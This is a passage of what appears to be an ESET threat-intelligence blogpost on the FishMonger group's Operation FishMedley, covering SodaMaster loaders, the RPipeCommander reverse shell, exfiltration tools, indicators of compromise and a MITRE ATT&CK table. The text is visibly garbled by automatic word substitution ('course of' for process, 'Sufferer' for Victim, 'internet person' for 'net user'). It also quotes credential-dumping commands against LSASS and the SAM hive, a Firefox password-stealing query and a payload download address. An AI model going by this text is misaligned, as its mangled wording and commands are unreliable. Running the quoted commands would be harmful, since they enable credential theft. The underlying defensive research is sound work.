monospace;\">3C08C694C222E7346BD8<wbr\/>633461C5D19EAE18B661<\/span><\/td>\n<td width=\"170\"><span style=\"font-family: courier new, courier, monospace;\">DrsSDK.dll<\/span><\/td>\n<td width=\"293\"><span style=\"font-family: courier new, courier, monospace;\"><current_directory>debug.png<\/current_directory><\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">D8B631C551845F892EBB<wbr\/>5E7D09991F6C9D4FACAD<\/span><\/td>\n<td width=\"170\"><span style=\"font-family: courier new, courier, monospace;\">libvlc.dll<\/span><\/td>\n<td width=\"293\"><span style=\"font-family: courier new, courier, monospace;\"><current_directory>vlc.cnf<\/current_directory><\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">3A702704653EC847CF91<wbr\/>21E3F454F3DBE1F90AFD<\/span><\/td>\n<td width=\"170\"><span style=\"font-family: courier new, courier, monospace;\">safestore64.dll<\/span><\/td>\n<td width=\"293\"><span style=\"font-family: courier new, courier, monospace;\"><current_directory>Location<\/current_directory><\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">3630F62771360540B667<wbr\/>01ABC8F6C868087A6918<\/span><\/td>\n<td width=\"170\"><span style=\"font-family: courier new, courier, monospace;\">DeElevator64.dll<\/span><\/td>\n<td width=\"293\"><span style=\"font-family: courier new, courier, monospace;\"><current_directory>Location<\/current_directory><\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">A4F68D0F1C72C3AC9D70<wbr\/>919C17DC52692C43599E<\/span><\/td>\n<td width=\"170\"><span style=\"font-family: courier new, courier, monospace;\">libmaxminddb-0.dll<\/span><\/td>\n<td width=\"293\"><span style=\"font-family: courier new, courier, monospace;\">C:windowssystem32<wbr\/>MsKeyboardFilterapi.dll<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5401E3EF903AFE981CFC<wbr\/>2840D5F0EF2F1D83B0BF<\/span><\/td>\n<td width=\"170\"><span style=\"font-family: courier new, courier, monospace;\">safestore641.dll<\/span><\/td>\n<td width=\"293\"><span style=\"font-family: courier new, courier, monospace;\"><current_directory>Location<\/current_directory><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Then, the decrypted buffer is injected right into a newly created, suspended <span style=\"font-family: courier new, courier, monospace;\">svchost.exe<\/span> course of \u2013 see Determine 4.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 4. SodaMaster injection\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-4.png\" alt=\"Figure 4. SodaMaster injection\" width=\"\" height=\"\"\/><figcaption><em>Determine 4. SodaMaster injection<\/em><\/figcaption><\/figure>\n<p>Lastly, the shellcode is executed utilizing both <span style=\"font-family: courier new, courier, monospace;\">CreateRemoteThread<\/span> (on Home windows XP or older variations) or, on newer Home windows variations, by way of <span style=\"font-family: courier new, courier, monospace;\">NtCreateThreadEx<\/span> as proven in Determine 5.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 5. Execution of the injected payload\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-5.png\" alt=\"Figure 5. Execution of the injected payload\" width=\"\" height=\"\"\/><figcaption><em>Determine 5. Execution of the injected payload<\/em><\/figcaption><\/figure>\n<p>The final 4 loaders in Desk 5 have extra options:<\/p>\n<ul>\n<li>They&#8217;ve an export named <span style=\"font-family: courier new, courier, monospace;\">getAllAuthData<\/span> that implements a password stealer for Firefox. It reads the Firefox SQLite database and runs the question <span style=\"font-family: courier new, courier, monospace; white-space: nowrap;\">SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins<\/span>.<\/li>\n<li>The final three loaders persist as a service named <span style=\"font-family: courier new, courier, monospace;\">Netlock<\/span>, <span style=\"font-family: courier new, courier, monospace;\">MsKeyboardFiltersrv<\/span>, and <span style=\"font-family: courier new, courier, monospace;\">downmap<\/span>, respectively.<\/li>\n<\/ul>\n<h5>SodaMaster payload<\/h5>\n<p>As talked about above, the SodaMaster payload was publicly analyzed by Kaspersky and the samples we\u2019ve discovered don\u2019t appear to have developed a lot. They nonetheless implement the identical 4 backdoor instructions (<span style=\"font-family: courier new, courier, monospace;\">d<\/span>, <span style=\"font-family: courier new, courier, monospace;\">f<\/span>, <span style=\"font-family: courier new, courier, monospace;\">l<\/span>, and <span style=\"font-family: courier new, courier, monospace;\">s<\/span>) that had been current in 2021.<\/p>\n<p>Desk 6 reveals the configurations from the 4 completely different SodaMaster payloads that we recognized. Operators used a special C&amp;C server per sufferer, however we will see that Victims B and C share the identical hardcoded RSA key.<\/p>\n<p style=\"text-align: center;\"><em>Desk 6. SodaMaster configuration<\/em><\/p>\n<h4><span style=\"font-weight: 400;\"><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"56\"><strong>Sufferer<\/strong><\/td>\n<td width=\"142\"><strong>C&amp;C server<\/strong><\/td>\n<td width=\"438\"><strong>RSA key<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"56\"><strong>B<\/strong><\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">162.33.178[.]23<\/span><\/td>\n<td width=\"438\"><span style=\"font-family: courier new, courier, monospace;\">MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6Cg<wbr\/>XMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV<wbr\/>DPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV<wbr\/>ZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>C<\/strong><\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">78.141.202[.]70<\/span><\/td>\n<td width=\"438\"><span style=\"font-family: courier new, courier, monospace;\">MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6Cg<wbr\/>XMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV<wbr\/>DPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV<wbr\/>ZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>F<\/strong><\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">192.46.223[.]211<\/span><\/td>\n<td width=\"438\"><span style=\"font-family: courier new, courier, monospace;\">MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdj<wbr\/>Uk3e+\/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm\/JIK+7b<wbr\/>XikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68H<wbr\/>ygzq19AgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>G<\/strong><\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">168.100.10[.]136<\/span><\/td>\n<td width=\"438\"><span style=\"font-family: courier new, courier, monospace;\">MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6N<wbr\/>lc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6<wbr\/>+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi<wbr\/>21PGk5AgMBAAE=<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/span><\/h4>\n<h4>RPipeCommander<\/h4>\n<p>At Sufferer D, we captured a beforehand unknown implant in the identical course of the place Spyder was working. It was most likely loaded from disk or downloaded by Spyder. As a result of its DLL export title was <span style=\"font-family: courier new, courier, monospace;\">rcmd64.dll<\/span>, we named this implant RPipeCommander.<\/p>\n<p>RPipeCommander is multithreaded and makes use of <span style=\"font-family: courier new, courier, monospace;\">IoCompletionPort<\/span> to handle the I\/O requests of the a number of threads. It creates the named pipe <span style=\"font-family: courier new, courier, monospace;\">.PipeCmdPipe<pid\/><\/span>, the place <span style=\"font-family: courier new, courier, monospace;\"><pid\/><\/span> is the present course of ID, and reads from and writes into this pipe.<\/p>\n<p>RPipeCommander is a reverse shell that accepts three instructions by way of the named pipe:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">h<\/span> (<span style=\"font-family: courier new, courier, monospace;\">0x68<\/span>): create a <span style=\"font-family: courier new, courier, monospace;\">cmd.exe<\/span> course of and bind pipes to the method to ship instructions and browse the output.<\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">i<\/span> (<span style=\"font-family: courier new, courier, monospace;\">0x69<\/span>): Write a command within the current <span style=\"font-family: courier new, courier, monospace;\">cmd.exe<\/span> course of or learn the output of the earlier command.<\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">j<\/span> (<span style=\"font-family: courier new, courier, monospace;\">0x6A<\/span>): exit the <span style=\"font-family: courier new, courier, monospace;\">cmd.exe<\/span> course of by writing <span style=\"font-family: courier new, courier, monospace;\">exitrn<\/span> within the command shell.<\/li>\n<\/ul>\n<p>Word that it appears we solely have the server facet of RPipeCommander. It&#8217;s probably {that a} second part, a shopper, is used to ship instructions to the server from one other machine on the native community.<\/p>\n<p>Lastly, RPipeCommander is written in C++ and RTTI data was included within the captured samples, permitting us to acquire a number of the class names:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">CPipeServer<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">CPipeBuffer<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">CPipeSrvEvent<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">CPipeServerEventHandler<\/span><\/li>\n<\/ul>\n<h4>Different instruments<\/h4>\n<p>Along with the principle implants described above, the attackers used just a few extra instruments to gather or exfiltrate information, which we describe in Desk 7.<\/p>\n<p style=\"break-after: avoid; text-align: center;\"><em>Desk 7. Different instruments used throughout Operation FishMedley<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"151\"><strong>Filename<\/strong><\/td>\n<td width=\"492\"><strong>Particulars<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">C:Windowssystem32<wbr\/>sasetup.dll<\/span><\/td>\n<td width=\"492\">Customized <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/pentestlab.blog\/2020\/02\/10\/credential-access-password-filter-dll\/\">password filter<\/a>. The export <span style=\"font-family: courier new, courier, monospace;\">PasswordChangeNotify<\/span> is known as when the person adjustments their password, and it writes the brand new password on disk within the present working listing in a log file named <span style=\"font-family: courier new, courier, monospace;\">etuper.log<\/span>. Word that it will probably additionally exfiltrate the password by sending a POST request to a hardcoded C&amp;C server, with <span style=\"font-family: courier new, courier, monospace;\">flag=<password\/><\/span> within the POST information. Nonetheless, this performance will not be enabled on this particular pattern and there&#8217;s no C&amp;C server within the configuration.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">C:Windowsdebug<wbr\/>svhost.tmp<\/span><\/td>\n<td width=\"492\">The fscan community scanner, obtainable on <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/shadow1ng\/fscan\/\">GitHub<\/a>.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">C:nb.exe<\/span><\/td>\n<td width=\"492\"><a rel=\"nofollow\" target=\"_blank\" href=\"http:\/\/www.unixwiz.net\/tools\/nbtscan.html\">nbtscan<\/a> \u2013 a NetBIOS scanner.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">C:Userspublic<wbr\/>drop.zip<\/span><\/td>\n<td width=\"492\">It accommodates solely <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/dropbox\/dbxcli\/\">dbxcli<\/a> \u2013 a device written in Go to work together with Dropbox. It was probably used to exfiltrate information from the sufferer\u2019s community, however we haven\u2019t retrieved any details about the attackers\u2019 account.<br \/>Word that, regardless of the<span style=\"font-family: courier new, courier, monospace;\">.zip<\/span> extension, it is a CAB file. It was downloaded from <span style=\"font-family: courier new, courier, monospace;\">http:\/\/45.76.165[.]227\/wECqKe529r.png<\/span>.<br \/>Additionally be aware that dbxcli appears to have been compiled by the attackers, for the reason that hash (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">2AD82FFA393937A2353096FE2A2209E0EBC1C9D7<\/span>) has a really low prevalence within the wild.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Conclusion<\/h2>\n<p>On this blogpost, we now have proven how FishMonger carried out a marketing campaign in opposition to high-profile entities all world wide and was the topic of a US DOJ indictment in March 2025. We additionally confirmed that the group will not be shy about reusing well-known implants, resembling ShadowPad or SodaMaster, even lengthy after they&#8217;ve been publicly described. Lastly, we now have independently confirmed that FishMonger is a staff that&#8217;s a part of the Chinese language firm I\u2011SOON.<\/p>\n<blockquote>\n<div><em>For any inquiries about our analysis revealed on WeLiveSecurity, please contact us at <a rel=\"nofollow\" target=\"_blank\" style=\"background-color: #f4f4f4;\" href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/operation-fishmedley\/mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>.\u00a0<\/em><\/div>\n<div><em>ESET Analysis affords personal APT intelligence reviews and information feeds. For any inquiries about this service, go to the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=operation-fishmedley&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\">ESET Menace Intelligence<\/a> web page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p><em>A complete checklist of indicators of compromise (IoCs) and samples might be present in <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/fishmonger\" target=\"_blank\" rel=\"noopener\">our GitHub repository<\/a>.<\/em><\/p>\n<h3>Recordsdata<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"151\"><strong>Filename<\/strong><\/td>\n<td width=\"142\"><strong>Detection<\/strong><\/td>\n<td width=\"170\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">D61A4387466A0C999981<wbr\/>086C2C994F2A80193CE3<\/span><\/td>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\">Win32\/Agent.ADVC<\/td>\n<td width=\"170\">ShadowPad dropper.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">918DDD842787D64B244D<wbr\/>353BFC0E14CC037D2D97<\/span><\/td>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">log.dll<\/span><\/td>\n<td width=\"142\">Win32\/Agent.ADVC<\/td>\n<td width=\"170\">ScatterBee-packed ShadowPad loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">F12C8CEC813257890F48<wbr\/>56353ABD9F739DEED890<\/span><\/td>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">process.exe<\/span><\/td>\n<td width=\"142\">Win64\/Agent.BEJ<\/td>\n<td width=\"170\">Spyder loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">3630F62771360540B667<wbr\/>01ABC8F6C868087A6918<\/span><\/td>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">DeElevator64<wbr\/>.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">3C08C694C222E7346BD8<wbr\/>633461C5D19EAE18B661<\/span><\/td>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">DrsSDK.dll<\/span><\/td>\n<td width=\"142\">Win64\/Agent.CAC<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5401E3EF903AFE981CFC<wbr\/>2840D5F0EF2F1D83B0BF<\/span><\/td>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">safestore64<wbr\/>.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">A4F68D0F1C72C3AC9D70<wbr\/>919C17DC52692C43599E<\/span><\/td>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">libmaxminddb<wbr\/>-0.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">D8B631C551845F892EBB<wbr\/>5E7D09991F6C9D4FACAD<\/span><\/td>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">libvlc.dll<\/span><\/td>\n<td width=\"142\">Win64\/Agent.BFZ<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">3F5F6839C7DCB1D164E4<wbr\/>813AF2E30E9461AB35C1<\/span><\/td>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">sasetup.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CB<\/td>\n<td width=\"170\">Malicious password filter.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Community<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"151\"><strong>IP<\/strong><\/td>\n<td width=\"113\"><strong>Area<\/strong><\/td>\n<td width=\"142\"><strong>Internet hosting supplier<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td width=\"151\"><strong>Particulars<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">213.59.118[.]124<\/span><\/td>\n<td width=\"113\"><span style=\"font-family: courier new, courier, monospace;\">api.googleau<wbr\/>thenticatoro<wbr\/>nline[.]com<\/span><\/td>\n<td width=\"142\">STARK INDUSTRIES<\/td>\n<td width=\"85\">2022\u201103\u201120<\/td>\n<td width=\"151\">ShadowPad C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">61.238.103[.]165<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">IRT-HKBN-HK<\/td>\n<td width=\"85\">2022\u201103\u201110<\/td>\n<td width=\"151\">Spyder C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">162.33.178[.]23<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2022\u201103\u201128<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">78.141.202[.]70<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">The Fixed Firm<\/td>\n<td width=\"85\">2022\u201105\u201118<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">192.46.223[.]211<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">Akamai Related Cloud<\/td>\n<td width=\"85\">2022\u201106\u201122<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">168.100.10[.]136<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2022\u201105\u201112<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK strategies<\/h2>\n<p><em>This desk was constructed utilizing <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">model 16<\/a> of the MITRE ATT&amp;CK framework<strong>.<\/strong><\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"113\"><strong>Tactic<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td width=\"151\"><strong>Identify<\/strong><\/td>\n<td width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Useful resource Growth<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1583\/004\">T1583.004<\/a><\/td>\n<td width=\"151\">Purchase Infrastructure: Server<\/td>\n<td width=\"265\">FishMonger rented servers at a number of internet hosting suppliers.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1583\/001\">T1583.001<\/a><\/td>\n<td width=\"151\">Purchase Infrastructure: Domains<\/td>\n<td width=\"265\">FishMonger purchased domains and used them for C&amp;C site visitors.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Execution<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1059\/001\">T1059.001<\/a><\/td>\n<td width=\"151\">Command-Line Interface: PowerShell<\/td>\n<td width=\"265\">FishMonger downloaded ShadowPad utilizing PowerShell.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1059\/003\">T1059.003<\/a><\/td>\n<td width=\"151\">Command-Line Interface: Home windows Command Shell<\/td>\n<td width=\"265\">FishMonger deployed Spyder utilizing a BAT script.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1072\">T1072<\/a><\/td>\n<td width=\"151\">Software program Deployment Instruments<\/td>\n<td width=\"265\">FishMonger gained entry to an area admin console, abusing it to run instructions on different machines within the sufferer\u2019s community.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Persistence<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1543\/003\">T1543.003<\/a><\/td>\n<td width=\"151\">Create or Modify System Course of: Home windows Service<\/td>\n<td width=\"265\">Some SodaMaster loaders persist by way of a Home windows service.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Protection Evasion<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1574\/002\">T1574.002<\/a><\/td>\n<td width=\"151\">Hijack Execution Circulation: DLL Aspect-Loading<\/td>\n<td width=\"265\">ShadowPad is loaded by a DLL named <span style=\"font-family: courier new, courier, monospace;\">log.dll<\/span> that&#8217;s side-loaded by a reputable Bitdefender executable.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1140\">T1140<\/a><\/td>\n<td width=\"151\">Deobfuscate\/Decode Recordsdata or Info<\/td>\n<td width=\"265\">ShadowPad, Spyder, and SodaMaster are decrypted and loaded into reminiscence.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Credential Entry<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1555\/003\">T1555.003<\/a><\/td>\n<td width=\"151\">Credentials from Password Shops: Credentials from Net Browsers<\/td>\n<td width=\"265\">Some SodaMaster loaders can extract passwords from the native Firefox database.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1556\/002\">T1556.002<\/a><\/td>\n<td width=\"151\">Modify Authentication Course of: Password Filter DLL<\/td>\n<td width=\"265\">FishMonger used a customized password filter DLL that may write passwords to disk or exfiltrate them to a distant server.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1003\/001\">T1003.001<\/a><\/td>\n<td width=\"151\">OS Credential Dumping: LSASS Reminiscence<\/td>\n<td width=\"265\">FishMonger dumped LSASS reminiscence utilizing <span style=\"font-family: courier new, courier, monospace;\">rundll32 C:windowssystem32comsvcs.dll, MiniDump<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1003\/002\">T1003.002<\/a><\/td>\n<td width=\"151\">OS Credential Dumping: Safety Account Supervisor<\/td>\n<td width=\"265\">FishMonger dumped the safety account supervisor utilizing <span style=\"font-family: courier new, courier, monospace;\">reg save hklmsam C:userspublicmusicsam.hive<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1087\/001\">T1087.001<\/a><\/td>\n<td width=\"151\">Account Discovery: Native Account<\/td>\n<td width=\"265\">FishMonger executed <span style=\"font-family: courier new, courier, monospace;\">internet person<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1016\">T1016<\/a><\/td>\n<td width=\"151\">System Community Configuration Discovery<\/td>\n<td width=\"265\">FishMonger executed <span style=\"font-family: courier new, courier, monospace;\">ipconfig \/all<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1007\">T1007<\/a><\/td>\n<td width=\"151\">System Service Discovery<\/td>\n<td width=\"265\">FishMonger executed <span style=\"font-family: courier new, courier, monospace;\">tasklist \/svc<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1057\">T1057<\/a><\/td>\n<td width=\"151\">Course of Discovery<\/td>\n<td width=\"265\">FishMonger executed <span style=\"font-family: courier new, courier, monospace;\">tasklist \/v<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Lateral Motion<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1021\/002\">T1021.002<\/a><\/td>\n<td width=\"151\">Distant Companies: SMB\/Home windows Admin Shares<\/td>\n<td width=\"265\">FishMonger used Impacket to deploy malware on different machines within the native community.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Command and Management<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1095\">T1095<\/a><\/td>\n<td width=\"151\">Non-Software Layer Protocol<\/td>\n<td width=\"265\">ShadowPad communicates over uncooked TCP and UDP.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=operation-fishmedley&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" 